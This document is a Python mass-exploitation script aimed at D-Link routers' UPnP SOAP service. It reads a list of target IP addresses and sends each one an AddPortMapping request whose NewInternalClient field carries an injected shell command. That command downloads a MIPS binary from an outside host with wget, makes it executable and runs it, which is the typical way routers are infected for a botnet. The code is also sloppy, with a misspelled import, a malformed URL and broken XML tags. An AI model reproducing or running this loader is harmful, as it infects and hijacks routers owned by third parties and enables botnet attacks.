1
#! python !#
2
import threading, sys, time, random, socket, re, os, struct, array, requests, base64, subprocess
3
from sys import stdout
4
from Threading import thread
5
from Queue import *
6
ips = open(sys.argv[1], "r").readlines()
7
queue = Queue()
8
queue_count = 0
9
p1 = "<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><SOAP-ENV:Body><m:AddPortMapping xmlns:m=\"urn:schemas-upnp-org:service:WANIPConnection:1\"><NewPortMappingDescription><NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>`cd /tmp;wget http:1.1.1.1/bins/mips;chmod 777 *;./mips dlink.exploit/</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping><SOAPENV:Body><SOAPENV:envelope>"
10

11
headerlist = {'SOAPAction': 'urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping'}
12

13

14
def rtek(host):
15
    try:
16
		url = "http://" + host + ":49152/soap.cgi?service=WANIPConn1"
17
		requests.post(url, timeout=5, headers=headerlist, data=p1)
18
    except:
19
        pass
20
    return
21

22
def main():
23
    global queue_count
24
    for line in ips:
25
        line = line.strip("\r")
26
        line = line.strip("\n")
27
        queue_count += 1
28
        sys.stdout.write("\r[%d] Added to queue" % (queue_count))
29
        sys.stdout.flush()
30
        queue.put(line)
31
    sys.stdout.write("\n")
32
    i = 0
33
    while i != queue_count:
34
        i += 1
35
        try:
36
            input = queue.get()
37
            thread = Thread(target=rtek, args=(input,))
38
            thread.start()
39
        except KeyboardInterrupt:
40
            sys.exit("Interrupted? (ctrl + c)")
41
    thread.join()
42
    return
43

44
if __name__ == "__main__":
45
    main()
46